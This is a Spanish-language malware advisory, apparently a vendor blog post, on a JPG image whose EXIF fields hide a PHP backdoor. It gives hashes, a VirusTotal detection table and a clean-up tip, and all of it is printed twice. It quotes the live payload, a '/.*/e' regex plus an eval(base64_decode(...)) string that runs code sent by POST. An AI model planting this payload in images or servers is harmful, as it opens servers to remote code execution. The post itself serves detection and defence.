Recibimos nueva muestra de este malware en el código de una imagen JPG
Es una infeccion que algunos antivirus controlan, como el AV de Kaspersky (Backdoor.PHP.Peg.be ), que lo detecta y elimina.
Al ser un PHP, afecta especialmente a los servidores donde se ejecuta.
El preanalisis de virustotal ofrece este informe:
MD5 8b8ac04c6d1ccf5fd2783957af2472ba
SHA1 c0be07b37b8073b3054f9c6f1b59f4b40d3e60fb
File size 108.1 KB ( 110711 bytes )
SHA256: cf129eb835bdab824107971b019d3ab155a6a52405eb0863a5fe617f7a552dbc
Nombre: 002.jpg
Detecciones: 13 / 47
Fecha de análisis: 2013-12-20 16:01:29 UTC
0 1
Antivirus Resultado Actualización
Ad-Aware Trojan.PHP.Agent.GA 20131220
Agnitum ? 20131220
AhnLab-V3 ? 20131220121631
AntiVir ? 20131220
Antiy-AVL ? 20131220
Avast ? 20131220
AVG ? 20131220
Baidu-International ? 20131213
BitDefender Trojan.PHP.Agent.GA 20131220
Bkav ? 20131220
ByteHero ? 20130613085152
CAT-QuickHeal ? 20131218
ClamAV ? 20131220
CMC ? 20131217
Commtouch ? 20131220
Comodo ? 20131220
DrWeb PHP.ImageInject.1 20131220
Emsisoft Trojan.PHP.Agent.GA (B) 20131220
ESET-NOD32 ? 20131220
F-Prot ? 20131220
F-Secure Trojan.PHP.Agent.GA 20131220
Fortinet ? 20131220
GData Trojan.PHP.Agent.GA 20131220
Ikarus ? 20131220
Jiangmin ? 20131220
K7AntiVirus ? 20131220
K7GW ? 20131220
Kaspersky Backdoor.PHP.Peg.be 20131220
Kingsoft ? 20130829
Malwarebytes ? 20131220
McAfee ? 20131220
McAfee-GW-Edition ? 20131219
Microsoft ? 20131220
MicroWorld-eScan Trojan.PHP.Agent.GA 20131220
NANO-Antivirus Trojan.Jpg.Agent.cgxikf 20131220
Norman Backdoor.CDG 20131220
nProtect Trojan.PHP.Agent.GA 20131220
Panda ? 20131220
Rising ? 20131220
Sophos Troj/PHPDoor-J 20131220
SUPERAntiSpyware ? 20131220
Symantec Trojan Horse 20131220
TheHacker ? 20131219
TotalDefense ? 20131220
TrendMicro ? 20131220
TrendMicro-HouseCall ? 20131220
VBA32 ? 20131220
VIPRE ? 20131220
ViRobot ? 20131220
EN FABRICANTE Y PROPIEDADES DE LA CAMARA SE PUEDE VER EL CODIGO MALICIOSO
-> Fabricante de Equipo: /.*/e
-> Modelo de Camara: eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
Si se quiere conservar la imagen, puede conseguirse con el PAINT, abriendo el fichero y guardandolo como JPG de nuevo, con lo que se eliminan estas dos entradas
No vamos a controlarlo con nuestras utilidades al ser una infección, de la que se cuidan los AV como el arriba indicado.
saludos
ms, 23-12-2013
Es una infeccion que algunos antivirus controlan, como el AV de Kaspersky (Backdoor.PHP.Peg.be ), que lo detecta y elimina.
Al ser un PHP, afecta especialmente a los servidores donde se ejecuta.
El preanalisis de virustotal ofrece este informe:
MD5 8b8ac04c6d1ccf5fd2783957af2472ba
SHA1 c0be07b37b8073b3054f9c6f1b59f4b40d3e60fb
File size 108.1 KB ( 110711 bytes )
SHA256: cf129eb835bdab824107971b019d3ab155a6a52405eb0863a5fe617f7a552dbc
Nombre: 002.jpg
Detecciones: 13 / 47
Fecha de análisis: 2013-12-20 16:01:29 UTC
0 1
Antivirus Resultado Actualización
Ad-Aware Trojan.PHP.Agent.GA 20131220
Agnitum ? 20131220
AhnLab-V3 ? 20131220121631
AntiVir ? 20131220
Antiy-AVL ? 20131220
Avast ? 20131220
AVG ? 20131220
Baidu-International ? 20131213
BitDefender Trojan.PHP.Agent.GA 20131220
Bkav ? 20131220
ByteHero ? 20130613085152
CAT-QuickHeal ? 20131218
ClamAV ? 20131220
CMC ? 20131217
Commtouch ? 20131220
Comodo ? 20131220
DrWeb PHP.ImageInject.1 20131220
Emsisoft Trojan.PHP.Agent.GA (B) 20131220
ESET-NOD32 ? 20131220
F-Prot ? 20131220
F-Secure Trojan.PHP.Agent.GA 20131220
Fortinet ? 20131220
GData Trojan.PHP.Agent.GA 20131220
Ikarus ? 20131220
Jiangmin ? 20131220
K7AntiVirus ? 20131220
K7GW ? 20131220
Kaspersky Backdoor.PHP.Peg.be 20131220
Kingsoft ? 20130829
Malwarebytes ? 20131220
McAfee ? 20131220
McAfee-GW-Edition ? 20131219
Microsoft ? 20131220
MicroWorld-eScan Trojan.PHP.Agent.GA 20131220
NANO-Antivirus Trojan.Jpg.Agent.cgxikf 20131220
Norman Backdoor.CDG 20131220
nProtect Trojan.PHP.Agent.GA 20131220
Panda ? 20131220
Rising ? 20131220
Sophos Troj/PHPDoor-J 20131220
SUPERAntiSpyware ? 20131220
Symantec Trojan Horse 20131220
TheHacker ? 20131219
TotalDefense ? 20131220
TrendMicro ? 20131220
TrendMicro-HouseCall ? 20131220
VBA32 ? 20131220
VIPRE ? 20131220
ViRobot ? 20131220
EN FABRICANTE Y PROPIEDADES DE LA CAMARA SE PUEDE VER EL CODIGO MALICIOSO
-> Fabricante de Equipo: /.*/e
-> Modelo de Camara: eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
Si se quiere conservar la imagen, puede conseguirse con el PAINT, abriendo el fichero y guardandolo como JPG de nuevo, con lo que se eliminan estas dos entradas
No vamos a controlarlo con nuestras utilidades al ser una infección, de la que se cuidan los AV como el arriba indicado.
saludos
ms, 23-12-2013